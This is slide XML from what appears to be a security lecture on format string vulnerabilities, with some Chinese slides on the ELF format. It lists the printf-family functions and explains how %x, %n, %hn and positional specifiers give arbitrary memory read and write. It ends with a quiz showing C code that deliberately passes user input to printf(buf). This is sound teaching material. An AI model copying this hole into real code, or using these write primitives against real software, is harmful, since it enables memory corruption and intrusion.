            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2043" name="Shape 2043"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766733" y="4144933"/>
            <a:ext cx="3588800" cy="11076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 sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Quiz: can you find</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>the vuln?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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2047"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048" name="Shape 2048"/>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Format String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Shape 2049"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1792288"/>
            <a:ext cx="11360150" cy="4554537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Discovered and public since June 1999</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shocked the security community in the second half of 2000(influenced lots of programs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Format String Attacks, Newsham (2001)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use %x and %n to achieve arbitrary read and write</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFil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2053"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Shape 2054"/>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Format String Vuln Discovered(year2000)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Shape 2055"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip>
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="526967" y="1651467"/>
            <a:ext cx="11138067" cy="4930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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930837" y="1434895"/>
            <a:ext cx="8330326"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磁盘中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（可执行文件）与内存中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（进程内存映像）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D6B1A7-57DC-4FE9-B40B-096F28BB104B}"/>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3130432" y="2277991"/>
            <a:ext cx="5504762" cy="3342857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFCFD4E-9968-41AB-B367-AA9CD9F34C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007548" y="5620848"/>
            <a:ext cx="899605" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节视图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AB3CE3-B932-4FA0-8A70-CA807FFB2736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761480" y="5606344"/>
            <a:ext cx="877163" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>段视图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8770E1-A82E-4967-BE7A-6D510B03673C}"/>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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417092139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2059"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2060" name="Shape 2060"/>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Format String related Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Shape 2061"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• fprintf — prints to a FILE stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• printf — prints to the ‘stdout’ stream</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• sprintf — prints into a string</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• snprintf — prints into a string with length checking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vfprintf — print to a FILE stream from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vprintf — prints to ‘stdout’ from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsprintf — prints to a string from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• vsnprintf — prints to a string with length checking from a va_arg structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• setproctitle — set argv[]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>• syslog — output to the syslog facility</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2065"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="Shape 2066"/>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Format String syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Shape 2067"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print null terminated string pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print hex value of the arg (arbitrary read)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  store the bytes_written to location pointed by arg pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 2 bytes (short integer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - store 1 byte</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%&lt;positive integer&gt;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  print arbitrary count of chars controlled by integer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%123c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (filled by space)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%0512c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filled by 0)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful to change bytes_written so far</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%&lt;positive integer&gt;$&lt;fmt&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specify arg index</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%12$n</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>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2071"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Shape 2072"/>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Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2073" name="Shape 2073"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  1 #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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2 #include &lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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3</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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4 int flag = 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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5</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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6 int main(int argc, char **argv) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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7 	char buf[1024];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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8 	if (argc &lt; 2) return 1;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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9 	strncpy(buf, argv[1], min(sizeof(buf) - 1, 1024));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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10 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>printf(buf);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
